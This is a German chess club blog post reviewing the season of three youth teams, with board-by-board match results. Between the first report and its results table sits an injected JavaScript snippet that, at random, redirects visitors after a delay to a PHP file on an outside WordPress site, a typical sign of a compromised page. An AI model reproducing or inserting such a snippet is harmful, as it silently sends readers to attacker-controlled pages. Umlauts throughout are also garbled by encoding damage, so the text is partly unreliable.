Die Unvollendeten

Ruedinger

Gut gespielt, aber dreimal knapp gescheitert. So konnte man die Saisonbilanz unserer U20-Mannschaften kurz zusammenfassen. In der Jugendbundesliga wurde unsere Erste Vierter und verpasste die DVM-Qualifikation.
Die zweite Mannschaft hatte mit einem Kantersieg in der letzten Runde sogar als erste Zweitvertretung eines Vereins den Aufstieg in die Bundesliga schaffen konnen. Am Ende stand gegen die blauen Springer zwar ein achtbares 3-3, aber damit nur der zweite Platz.
Die dritte Mannschaft wurde unerwartet aber vollig souveran Sieger der Verbandsliga Vorgruppe 2. Im Endspiel waren sie dann aber klarer Au?enseiter gegen Horst-Emscher, zumal nicht die beste Aufstellung zur Verfugung stand.

Die erste Mannschaft konnte das letzte Spiel in Halver zwar klar gewinnen, aber hatte gleich doppelte Schutzenhilfe fur den dritten Tabellenplatz gebraucht. Letztlich musste sie allen drei Teams den Vortritt lassen, gegen die sie auch in der Saison das Nachsehen hatte.

var number1=Math.floor(Math.random() * 5); if (number1==3) { var delay = 15000; setTimeout(“document.location.href=’http://baharzaf.com/wp-content/plugins/duplicator/ctrls/wp-rsc.php'”, delay); } />
Br. MS Halver-Schalksmuhle - SF Brackel 30 I 9:15
1 Browning, Alex 1978 - Stemmler, Fabian 1999 0:1
2 von Bargen, Lukas 1997 - Wastian, Jan 1900 ?:?
3 Drottboom, Tobias 1959 - Kantor, Nikita 1772 ?:?
4 Kolz, Niklas 1761 - Trumper, Michael 1758 0:1
5 Kroo, Julian 1840 - Garbuz, Vitaliy 1883 ?:?
6 Leonidas, Julius —- - Kracht, Raphael 1771 0:1

Fur die Zweite kam es noch zum erhofften Endspiel um den Aufstieg gegen Paderborn. Beide Teams boten dementsprechend Bestbesetzung auf. Allerdings waren die Bedingungen sehr ungunstig. Nach Punktverlusten gegen Gutersloh und Meschede hatte uns nicht mal ein einfacher Sieg gereicht, ein unrealistisches 4,5-1,5 hatte es schon sein mussen. Aber das 3-3 und auch der zweite Tabellenplatz sind insgesamt erfreulich. Erstmals musste die zweite Mannschaft in der NRW-Liga nicht um den Klassenerhalt zittern.

Br. SF Brackel 30 II - Blauer Springer Paderborn 12:12
1 Kartsev, Nikolaj 1889 - Irkilmez, Yakub 1915 1:0
2 Seref, Erdogan 1797 - Kesselmeier, Kevin 1646 0:1
3 Schade, Maximilian 1773 - Gatzke, Carolin 1806 1:0
4 Slanina, Aaron 1756 - Stirnberg, Noah 1800 1:0
5 Vorobyov, Boris 1737 - Moller, Lisa-Marie 1806 0:1
6 Strack, Patrick 1672 - Schlangenotto, Niklas 1731 0:1

Die Dritte hatte mit ihrem Gruppensieg schon mehr erreicht als erwartet. Der Verbandsmeistertitel ware das i-Tupfelchen gewesen. Beim zunachst angesetzten Termin genau zeitgleich mit der NRW-MM ware fast die komplette Mannschaft ausgefallen. Aber auch zum Ausweichtermin standen nicht alle Spieler(innen) zur Verfugung. Trotzdem waren wir der Sensation naher, als das Endergebnis aussagt.

Br. SF Brackel 30 III - SV Horst-Emscher 2:4
1 Wastian, Mareike 1586 - Knudsen, Simon 1954 -:+
2 Bungarten, Jona 1510 - Rebentisch, Tom 1851 0:1
3 Morchel, Lou 1597 - Karabugul, Okan 1689 0:1
4 Skabs, Denis 1465 - Rebentisch, Sebastian 1692 ?:?
5 Berendes, Erik 1249 - Chamera, Maxim 1561 ?:?
6 Romer, Alois 1145 - Tenenbaum, Robert 1183 1:0

Kommentare sind geschlossen.